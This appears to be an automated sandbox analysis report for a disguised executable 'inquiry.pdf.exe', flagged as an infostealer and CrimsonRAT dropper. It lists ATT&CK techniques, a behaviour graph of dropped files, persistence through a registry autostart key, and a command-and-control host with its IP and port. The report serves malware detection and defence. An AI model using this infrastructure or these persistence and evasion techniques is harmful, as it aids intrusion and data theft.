            1
            Valid Accounts            		Windows Management Instrumentation1
            Valid Accounts            		1
            Valid Accounts            		1
            Disable or Modify Tools            		21
            Input Capture            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            Endpoint Denial of Service
            Default AccountsScheduled Task/Job1
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		12
            Obfuscated Files or Information            		LSASS Memory12
            System Information Discovery            		Remote Desktop Protocol21
            Input Capture            		Exfiltration Over Bluetooth11
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)211
            Process Injection            		1
            Software Packing            		Security Account Manager11
            Security Software Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
            Non-Standard Port            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)1
            Registry Run Keys / Startup Folder            		1
            Timestomp            		NTDS1
            Process Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer2
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script13
            Masquerading            		LSA Secrets21
            Virtualization/Sandbox Evasion            		SSHKeyloggingData Transfer Size Limits13
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Valid Accounts            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Modify Registry            		DCSync11
            Remote System Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc Filesystem1
            System Network Configuration Discovery            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)21
            Virtualization/Sandbox Evasion            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)211
            Process Injection            		Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
            Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
            Hidden Files and Directories            		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
            Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
            Hidden Users            		KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 715157 Sample: inquiry.pdf.exe Startdate: 03/10/2022 Architecture: WINDOWS Score: 100 60 hannoyputa.giize.com 2->60 74 Multi AV Scanner detection for domain / URL 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 Antivirus / Scanner detection for submitted sample 2->78 80 9 other signatures 2->80 10 inquiry.pdf.exe 15 3 2->10         started        signatures3 process4 dnsIp5 68 www.google.com 142.250.203.100, 443, 49699, 49705 GOOGLEUS United States 10->68 54 C:\Users\user\AppData\...\inquiry.pdf.exe.log, ASCII 10->54 dropped 102 Hides that the sample has been downloaded from the Internet (zone.identifier) 10->102 15 cmd.exe 3 10->15         started        19 cmd.exe 1 10->19         started        file6 signatures7 process8 file9 56 C:\Users\user\AppData\Roaming\glonkjhg.exe, PE32 15->56 dropped 58 C:\Users\...\glonkjhg.exe:Zone.Identifier, ASCII 15->58 dropped 70 Uses ping.exe to sleep 15->70 21 glonkjhg.exe 14 5 15->21         started        26 conhost.exe 15->26         started        28 PING.EXE 1 15->28         started        30 PING.EXE 1 15->30         started        72 Uses ping.exe to check the status of other devices and networks 19->72 32 reg.exe 1 1 19->32         started        34 PING.EXE 1 19->34         started        36 conhost.exe 19->36         started        signatures10 process11 dnsIp12 62 www.google.com 21->62 52 C:\Users\user\AppData\Local\...\jhFFFffkl.exe, PE32 21->52 dropped 92 Antivirus detection for dropped file 21->92 94 Multi AV Scanner detection for dropped file 21->94 96 Machine Learning detection for dropped file 21->96 100 3 other signatures 21->100 38 jhFFFffkl.exe 2 21->38         started        41 AddInProcess32.exe 3 2 21->41         started        44 jhFFFffkl.exe 21->44         started        46 AddInProcess32.exe 21->46         started        98 Creates an undocumented autostart registry key 32->98 64 127.0.0.1 unknown unknown 34->64 file13 signatures14 process15 dnsIp16 82 Antivirus detection for dropped file 38->82 84 Multi AV Scanner detection for dropped file 38->84 86 Machine Learning detection for dropped file 38->86 48 jhFFFffkl.exe 38->48         started        66 hannoyputa.giize.com 23.105.131.206, 3027, 49706, 49707 LEASEWEB-USA-NYC-11US United States 41->66 88 Increases the number of concurrent connection per server for Internet Explorer 41->88 90 Hides that the sample has been downloaded from the Internet (zone.identifier) 41->90 50 jhFFFffkl.exe 44->50         started        signatures17 process18

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            inquiry.pdf.exe39%ReversingLabsByteCode-MSIL.Infostealer.Generic
            inquiry.pdf.exe100%AviraHEUR/AGEN.1251650
            inquiry.pdf.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\glonkjhg.exe100%AviraHEUR/AGEN.1251650
            C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe100%AviraTR/Agent.able
            C:\Users\user\AppData\Roaming\glonkjhg.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe77%ReversingLabsByteCode-MSIL.Dropper.CrimsonRAT
            C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe14%MetadefenderBrowse
            C:\Users\user\AppData\Roaming\glonkjhg.exe39%ReversingLabsByteCode-MSIL.Infostealer.Generic

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            19.0.AddInProcess32.exe.900000.0.unpack100%AviraTR/Redcap.ghjptDownload File
            0.0.inquiry.pdf.exe.a90000.0.unpack100%AviraHEUR/AGEN.1251650Download File

            Domains

            SourceDetectionScannerLabelLink
            hannoyputa.giize.com6%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.founder.com.cn/cnQ0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cnT0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.fontbureau.comrz0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.founder.com.cn/cnt-b0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.carterandcone.comize0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/60%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.fontbureau.comony/O0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/Y0f0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/Y0f0%VirustotalBrowse
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.founder.com.cn/cn4j40%Avira URL Cloudsafe
            hannoyputa.giize.com0%Avira URL Cloudsafe
            http://www.carterandcone.comintTV0%Avira URL Cloudsafe
            http://www.fontbureau.comav0%Avira URL Cloudsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.fontbureau.com.TTF0%URL Reputationsafe
            http://www.fontbureau.comR.TTF0%URL Reputationsafe
            http://www.fontbureau.comB.TTFd0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/Y0%URL Reputationsafe
            http://www.galapagosdesign.com/0%URL Reputationsafe
            http://www.carterandcone.comTC0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/O0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.fontbureau.comd0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.founder.com.cn/cn/0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.carterandcone.comIta0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/v0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/s-e0%URL Reputationsafe
            http://www.fontbureau.comm0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.zhongyicts.com.cno.0%URL Reputationsafe
            http://www.founder.com.cn/cn&0%URL Reputationsafe
            http://www.fontbureau.comsief0%URL Reputationsafe
            http://ns.adobe.c/gImt0%Avira URL Cloudsafe
            http://www.fontbureau.comI.TTF60%Avira URL Cloudsafe
            http://www.fontbureau.comdva0%Avira URL Cloudsafe
            http://ns.ado/1Imt0%Avira URL Cloudsafe
            http://www.fontbureau.comalsF50%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/ueT0%Avira URL Cloudsafe
            http://www.fontbureau.comdv0%Avira URL Cloudsafe
            http://www.carterandcone.como.(0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/Y0=0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/vad0%Avira URL Cloudsafe
            http://www.carterandcone.commbe0%Avira URL Cloudsafe
            http://www.carterandcone.comers0%Avira URL Cloudsafe
            http://www.carterandcone.comgo0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/nyg0%Avira URL Cloudsafe
            http://ns.adobe.cobjImt0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/k-u0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            hannoyputa.giize.com
            		23.105.131.206
            		truetrueunknown
            www.google.com
            		142.250.203.100
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              hannoyputa.giize.comtrue
              • Avira URL Cloud: safe
              		unknown
              https://www.google.com/false
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.fontbureau.com/designersGinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.founder.com.cn/cnQinquiry.pdf.exe, 00000000.00000003.261220547.0000000006521000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/?inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.carterandcone.comizeinquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.founder.com.cn/cn/bTheinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers?inquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.founder.com.cn/cnTinquiry.pdf.exe, 00000000.00000003.261348606.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.tiro.cominquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.261663692.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designersinquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersZinquiry.pdf.exe, 00000000.00000003.267507239.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267605251.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.goodfont.co.krinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.carterandcone.cominquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.comrzinquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297641323.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297186585.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.sajatypeworks.cominquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/frere-jones.html4j-inquiry.pdf.exe, 00000000.00000003.268808715.000000000652D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268232591.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268609542.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268447326.000000000652B000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.founder.com.cn/cnt-binquiry.pdf.exe, 00000000.00000003.261348606.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.typography.netDinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.google.cominquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.comony/Oinquiry.pdf.exe, 00000000.00000003.268711207.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268869519.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268505507.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269741425.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269921483.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269618980.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.founder.com.cn/cn/cTheinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.jiyu-kobo.co.jp/Y0finquiry.pdf.exe, 00000000.00000003.263731391.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.fontbureau.com/designers/frere-jones.htmlIinquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.galapagosdesign.com/staff/dennis.htminquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.cominquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designerslinquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270082779.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.jiyu-kobo.co.jp/6inquiry.pdf.exe, 00000000.00000003.265008494.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265192746.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265339385.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264392278.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264265006.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264856824.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264485654.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265497842.000000000654D000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265844488.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265649710.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.265956637.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn4j4inquiry.pdf.exe, 00000000.00000003.261323232.0000000006548000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.comavinquiry.pdf.exe, 00000000.00000003.298903445.000000000654F000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.306760136.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.298246614.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289506947.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.312562087.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289778859.0000000006548000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297641323.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.289172443.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297909896.000000000654C000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.297186585.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.290241764.000000000654E000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.298549688.000000000654E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.carterandcone.comintTVinquiry.pdf.exe, 00000000.00000003.262585211.000000000652B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.262701273.000000000652B000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.fontbureau.com/inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.galapagosdesign.com/DPleaseinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.jiyu-kobo.co.jp/Y0inquiry.pdf.exe, 00000000.00000003.264031554.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.264163688.000000000654A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fonts.cominquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sandoll.co.krinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmln-uOinquiry.pdf.exe, 00000000.00000003.269385492.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.269095042.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.urwpp.deDPleaseinquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cninquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameinquiry.pdf.exe, 00000000.00000002.315753270.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.519656247.0000000002B51000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.sakkal.cominquiry.pdf.exe, 00000000.00000002.331989639.00000000077A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com.TTFinquiry.pdf.exe, 00000000.00000003.270835664.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270573391.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271015476.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267389986.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270205415.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270436764.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270676193.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271317829.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.271200899.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.270330968.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.comB.TTFdinquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.fontbureau.comR.TTFinquiry.pdf.exe, 00000000.00000003.267954853.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268308804.000000000654B000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.267698555.000000000654A000.00000004.00000800.00020000.00000000.sdmp, inquiry.pdf.exe, 00000000.00000003.268088562.000000000654B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://ns.adobe.c/gImtglonkjhg.exe, 00000012.00000003.394602968.0000000006715000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.392396802.0000000006715000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://ns.ado/1Imtglonkjhg.exe, 00000012.00000003.387459276.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387008337.0000000006712000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387841460.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000002.538918011.0000000006719000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387643648.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387150885.0000000006717000.00000004.00000800.00020000.00000000.sdmp, glonkjhg.exe, 00000012.00000003.387266561.0000000006715000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
